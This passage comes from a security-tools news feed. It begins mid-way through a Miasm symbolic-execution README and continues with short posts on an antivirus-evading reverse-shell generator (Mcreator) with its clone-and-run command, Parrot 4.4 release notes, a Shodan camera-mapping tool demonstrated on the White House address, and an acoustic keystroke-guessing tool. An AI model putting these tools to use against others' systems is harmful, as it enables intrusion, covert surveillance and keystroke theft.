EIP = zf?(loc_key_1,loc_key_2)
________________________________________________________________________________
af                 = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]
EIP                = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
pf                 = parity((ECX + 0x4)[0:8] + 0xFF)
IRDst              = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
zf                 = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)
ECX                = ECX + 0x4
of                 = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]
nf                 = ((ECX + 0x4)[0:8] + 0xFF)[7:8]
cf                 = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]
EBX                = EBX + 0x1
________________________________________________________________________________
>>>

Retry execution with a concrete ECX. Here, the symbolic / concolic execution reach the shellcode's end:

>>> from miasm2.expression.expression import ExprInt
>>> sb.symbols[machine.mn.regs.ECX] = ExprInt(-3, 32)
>>> symbolic_pc = sb.run_at(ircfg, 0, step=True)
Instr LEA        ECX, DWORD PTR [ECX + 0x4]
Assignblk:
ECX = ECX + 0x4
________________________________________________________________________________
af                 = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]
EIP                = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
pf                 = parity((ECX + 0x4)[0:8] + 0xFF)
IRDst              = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
zf                 = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)
ECX                = 0x1
of                 = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]
nf                 = ((ECX + 0x4)[0:8] + 0xFF)[7:8]
cf                 = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]
EBX                = EBX + 0x1
________________________________________________________________________________
Instr LEA        EBX, DWORD PTR [EBX + 0x1]
Assignblk:
EBX = EBX + 0x1
________________________________________________________________________________
af                 = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]
EIP                = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
pf                 = parity((ECX + 0x4)[0:8] + 0xFF)
IRDst              = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
zf                 = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)
ECX                = 0x1
of                 = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]
nf                 = ((ECX + 0x4)[0:8] + 0xFF)[7:8]
cf                 = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]
EBX                = EBX + 0x2
________________________________________________________________________________
Instr CMP        CL, 0x1
Assignblk:
zf = (ECX[0:8] + -0x1)?(0x0,0x1)
nf = (ECX[0:8] + -0x1)[7:8]
pf = parity((ECX[0:8] + -0x1) & 0xFF)
of = ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1))[7:8]
cf = (((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1)) ^ ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1)))[7:8]
af = ((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1))[4:5]
________________________________________________________________________________
af                 = 0x0
EIP                = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
pf                 = 0x1
IRDst              = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
zf                 = 0x1
ECX                = 0x1
of                 = 0x0
nf                 = 0x0
cf                 = 0x0
EBX                = EBX + 0x2
________________________________________________________________________________
Instr JZ         loc_key_1
Assignblk:
IRDst = zf?(loc_key_1,loc_key_2)
EIP = zf?(loc_key_1,loc_key_2)
________________________________________________________________________________
af                 = 0x0
EIP                = 0x10
pf                 = 0x1
IRDst              = 0x10
zf                 = 0x1
ECX                = 0x1
of                 = 0x0
nf                 = 0x0
cf                 = 0x0
EBX                = EBX + 0x2
________________________________________________________________________________
Instr LEA        EBX, DWORD PTR [EBX + 0x1]
Assignblk:
EBX = EBX + 0x1
________________________________________________________________________________
af                 = 0x0
EIP                = 0x10
pf                 = 0x1
IRDst              = 0x10
zf                 = 0x1
ECX                = 0x1
of                 = 0x0
nf                 = 0x0
cf                 = 0x0
EBX                = EBX + 0x3
________________________________________________________________________________
Instr LEA        EBX, DWORD PTR [EBX + 0x1]
Assignblk:
IRDst = loc_key_3
________________________________________________________________________________
af                 = 0x0
EIP                = 0x10
pf                 = 0x1
IRDst              = 0x13
zf                 = 0x1
ECX                = 0x1
of                 = 0x0
nf                 = 0x0
cf                 = 0x0
EBX                = EBX + 0x3
________________________________________________________________________________
Instr MOV        EAX, EBX
Assignblk:
EAX = EBX
________________________________________________________________________________
af                 = 0x0
EIP                = 0x10
pf                 = 0x1
IRDst              = 0x13
zf                 = 0x1
ECX                = 0x1
of                 = 0x0
nf                 = 0x0
cf                 = 0x0
EBX                = EBX + 0x3
EAX                = EBX + 0x3
________________________________________________________________________________
Instr RET
Assignblk:
IRDst = @32[ESP[0:32]]
ESP = {ESP[0:32] + 0x4 0 32}
EIP = @32[ESP[0:32]]
________________________________________________________________________________
af                 = 0x0
EIP                = @32[ESP]
pf                 = 0x1
IRDst              = @32[ESP]
zf                 = 0x1
ECX                = 0x1
of                 = 0x0
nf                 = 0x0
cf                 = 0x0
EBX                = EBX + 0x3
ESP                = ESP + 0x4
EAX                = EBX + 0x3
________________________________________________________________________________
>>>

How does it work?
Miasm embeds its own disassembler, intermediate language and instruction semantic. It is written in Python.
To emulate code, it uses LLVM, GCC, Clang or Python to JIT the intermediate representation. It can emulate shellcodes and all or parts of binaries. Python callbacks can be executed to interact with the execution, for instance to emulate library functions effects.

Documentation
TODO
An auto-generated documentation is available here.

Obtaining Miasm

Clone the repository: Miasm on GitHub
Get one of the Docker images at Docker Hub

Software requirements
Miasm uses:

python-pyparsing
python-dev
elfesteem from Elfesteem
optionally python-pycparser (version >= 2.17)

To enable code JIT, one of the following module is mandatory:

GCC
Clang
LLVM with Numba llvmlite, see below

'optional' Miasm can also use:

Z3, the Theorem Prover

Configuration

Install elfesteem

git clone https://github.com/serpilliere/elfesteem.git elfesteem
cd elfesteem
python setup.py build
sudo python setup.py install

To use the jitter, GCC or LLVM is recommended

GCC (any version)
Clang (any version)
LLVM
- Debian (testing/unstable): Not tested
- Debian stable/Ubuntu/Kali/whatever: pip install llvmlite or install from llvmlite
- Windows: Not tested
Build and install Miasm:

$ cd miasm_directory
$ python setup.py build
$ sudo python setup.py install

If something goes wrong during one of the jitter modules compilation, Miasm will skip the error and disable the corresponding module (see the compilation output).

Windows & IDA
Most of Miasm's IDA plugins use a subset of Miasm functionnality. A quick way to have them working is to add:

elfesteem directory and pyparsing.py to C:\...\IDA\python\ or pip install pyparsing elfesteem
miasm2/miasm2 directory to C:\...\IDA\python\

All features excepting JITter related ones will be available. For a more complete installation, please refer to above paragraphs.

Testing
Miasm comes with a set of regression tests. To run all of them:

cd miasm_directory/test
python test_all.py

Some options can be specified:

Mono threading: -m
Code coverage instrumentation: -c
Only fast tests: -t long (excludes the long tests)

They already use Miasm

Tools

Sibyl: A function divination too
R2M2: Use miasm2 as a radare2 plugin
CGrex : Targeted patcher for CGC binaries
ethRE Reversing tool for Ethereum EVM (with corresponding Miasm2 architecture)

Blog posts / papers / conferences

Deobfuscation: recovering an OLLVM-protected program
Taming a Wild Nanomite-protected MIPS Binary With Symbolic Execution: No Such Crackme
Génération rapide de DGA avec Miasm: Quick computation of DGA (French article)
Enabling Client-Side Crash-Resistance to Overcome Diversification and Information Hiding: Detect undirected call potential arguments
Miasm: Framework de reverse engineering (French)
Tutorial miasm (French video)
Graphes de dépendances : Petit Poucet style: DepGraph (French)

Books

Practical Reverse Engineering: X86, X64, Arm, Windows Kernel, Reversing Tools, and Obfuscation: Introduction to Miasm (Chapter 5 "Obfuscation")
BlackHat Python - Appendix: Japan security book's samples

Misc

Man, does miasm has a link with rr0d?
Yes! crappy code and uggly documentation.

Download Miasm

↧

Mcreator - Encoded Reverse Shell Generator With Techniques To Bypass AV's

November 28, 2018, 12:12 pm

≫ Next: Parrot Security 4.4 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

≪ Previous: Miasm - Reverse Engineering Framework In Python

Encoded Reverse Shell Generator With Techniques To Bypass AV's

Installation

git clone https://github.com/blacknbunny/mcreator.git && cd mcreator/ && python mcreator.py

Version
python 2.7.* can't be lower or higher than 2.7 cause of the """ syntax in scripts.

Runnig mcreator console

python mcreator.py -rsg console

Commands
https://github.com/blacknbunny/mcreator/wiki/Commands

Reverse Shells
https://github.com/blacknbunny/mcreator/wiki/Reverse-Shells

Techniques
https://github.com/blacknbunny/mcreator/wiki/Techniques

Compiling
https://github.com/blacknbunny/mcreator/wiki/Compiling

An example to tool
https://github.com/blacknbunny/mcreator/wiki/An-example

Help

usage: mcreator.py [-h] [-rsg RSGENERATOR]

Reverse Shell generator with techniques to bypass all the AV's

optional arguments:
  -h, --help            show this help message and exit
  -rsg RSGENERATOR, --rsgenerator RSGENERATOR
                        Reverse Shell Generator With Encryptions & Techniques

Download Mcreator

↧

Parrot Security 4.4 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

November 29, 2018, 3:33 am

≫ Next: Kamerka - Build Interactive Map Of Cameras From Shodan

≪ Previous: Mcreator - Encoded Reverse Shell Generator With Techniques To Bypass AV's

Parrot 4.4 is now available for download. This release provides security and stability updates and is the starting point for the plan to develop an LTS edition of Parrot.

Parrot 4.4 Development Goals

The Parrot 4.4 development process involved the ideas of many people in the community, and the goal of this new update was mainly to target software developers and increase average system stability.

Upgrade from a previous version

sudo parrot-upgrade

sudo apt update
sudo apt full-upgrade

Debian Testing stability status

Parrot is based on Debian Testing, which is now entering an important stabilization stage for new Debian 10 (buster) release, that should arrive around the second quarter of 2019. This means that Parrot is up to see a new golden age of stability and reliability, which this time is going to last very long since the team announced the Parrot Long Term Support project in the previous release note.

New Golang, Rust, Vala and Mono support

There is a big interest in the Parrot team to offer a comfortable environment for software developers and those pentesters who usually write or modify their tools, and even if we already support python, java, c/c++, ruby, perl, bash and php, there is a big interest in the community in other emerging programming languages like golang, rust or vala.

Parrot 4.4 added for the first time full support for golang, rust, vala and mono (a FLOSS and independent .NET implementation). We believe software developers will benefit from this internal choice that required a lot of effort in order to keep the ISO files within their usual sizes.

New Privacy Metapackage

parrot-privacy now provides all the privacy-related applications as anonsurf, torbrowser, ricochet-im, onionshare and more.

People who need stronger privacy have now a dedicated metapackage.

KDE Plasma Edition

The development of the KDE Plasma edition gave very interesting results, and now Parrot 4.4 provides an awesome KDE flavor with our custom themes and settings for all our users that don’t like MATE and prefer a more advanced and feature-rich (but heavier) desktop environment.

Parrot KDE includes the latest 5.13 Plasma desktop with custom configurations that proved to be very lightweight and fast with a small memory footprint, and we will continue to improve this flavor in the future.

BTRFS and XFS are the new default filesystem

The new Debian-Installer was modified to use btrfs by default for root and xfs for the home filesystem. The installer does no longer create a swap partition when automatically partitioning uefi or encrypted systems, and the boot partition is large enough to host multiple kernel revisions without running out of space.

Btrfs and xfs are very powerful advanced filesystems with CoW, subvolumes, snapshots and other features. While xfs is very fast on some specific workloads, btrfs has additional features like live compression and a very efficient checksuming system for file corruption detection.

Btrfs was considered experimental for many years and it is still under heavy development, but its core features are now stable and production ready (but not ready for mission critical scenarios) and many companies already use it and contribute to its development, including facebook, suse, oracle and more.

Download Parrot Security 4.4

↧

Kamerka - Build Interactive Map Of Cameras From Shodan

November 29, 2018, 12:22 pm

≫ Next: Kbd-Audio - Tools For Capturing And Analysing Keyboard Input Paired With Microphone Capture

≪ Previous: Parrot Security 4.4 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

Build an interactive map of cameras from Shodan.
The script creates a map of Shodan cameras based on your address or coordinates. https://medium.com/@woj_ciech/%EA%93%98amerka-build-interactive-map-of-cameras-from-shodan-a0267849ec0a

Requirements

Shodan
Geopy
Foilum
Colorama

pip install -r requirements.txt
Change API_KEY in line 14

Restrictions
It can be used only with a paid Shodan plan. Build with Python 2.

Usage

root@kali: python kamerka.py --address "White House"

White House, 1600, Pennsylvania Avenue Northwest, Golden Triangle, Washington, D.C., 20500, USA
Found 81 results
IP: xxx.xxx.xxx.xxx
Coordinates: 38.xxx,-77.xxx
-----------------------------------
IP: xxx.xxx.xxx.xxx
Coordinates: 38.xxx,-77.xxx
-----------------------------------
IP: xxx.xxx.xxx.xxx
Coordinates: 38.xxx,-77.xxx
-----------------------------------
...
-----------------------------------
IP: xxx.xxx.xxx.xxx
Coordinates: 38.xxx,-77.xxx
-----------------------------------
Saving map as White House.html

kamerka.py --coordinates "x.y,x.y" --dark --radius 4

Other
Do not test on devices you don't own.

Download Kamerka

↧

Kbd-Audio - Tools For Capturing And Analysing Keyboard Input Paired With Microphone Capture

November 30, 2018, 3:43 am

≫ Next: XSSFuzzer - A Tool Which Generates XSS Payloads Based On User-Defined Vectors And Fuzzing Lists

≪ Previous: Kamerka - Build Interactive Map Of Cameras From Shodan

This is a collection of command-line and GUI tools for capturing and analyzing audio data. The most interesting tool is called keytap - it can guess pressed keyboard keys only by analyzing the audio captured from the computer's microphone.

Build instructions
Dependencies:

SDL2 - used to capture audio and to open GUI windows libsdl
FFTW3 - some of the helper tools perform Fourier transformations fftw

Linux and Mac OS

git clone https://github.com/ggerganov/kbd-audio
cd kbd-audio
git submodule update --init
mkdir build && cd build
cmake ..
make

Windows

(todo, PRs welcome)

Tools

record-full
Record audio to a raw binary file on disk
Usage: ./record-full output.kbd

play-full
Playback a recording captured via the record-full tool
Usage: ./play-full input.kbd

record
Record audio only while typing. Useful for collecting training data for keytap
Usage: ./record output.kbd

play
Playback a recording created via the record tool
Usage: ./play input.kbd

keytap
Detect pressed keys via microphone audio capture in real-time. Uses training data captured via the record tool.
Usage: ./keytap-gui input0.kbd [input1.kbd] [input2.kbd] ...
Live demo (WebAssembly threads required)

keytap2 (work in progress)
Detect pressed keys via microphone audio capture. Uses statistical information (n-gram frequencies) about the language. No training data is required. The 'recording.kbd' input file has to be generated via the record-full tool and contains the audio data that will be analyzed. The 'n-gram.txt' file has to contain n-gram probabilities for the corresponding language.
Usage: ./keytap2-gui recording.kbd n-gram.txt

Feedback
Any feedback about the performance of the tools is highly appreciated. Please drop a comment here.

Download Kbd-Audio

↧